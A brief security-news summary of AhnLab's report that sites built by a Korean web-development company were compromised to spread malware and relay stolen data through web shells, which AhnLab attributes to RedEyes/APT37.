AhnLab reports that websites built by a Korean web-development company were compromised and abused to distribute malware and transmit data stolen through web shells. The attack affected sites serving manufacturing, trade, electrical, electronics, education, construction, medical, and travel organizations, and the malware maintained persistence through Windows Task Scheduler. Infected hosts used mshta to connect to web-shell URLs hosted on already-compromised legitimate websites, making the remote-control channel harder for victims to recognize. AhnLab links the targeting to RedEyes/APT37 activity and assesses that externally accessible admin pages on the developer-built sites may have enabled malware upload.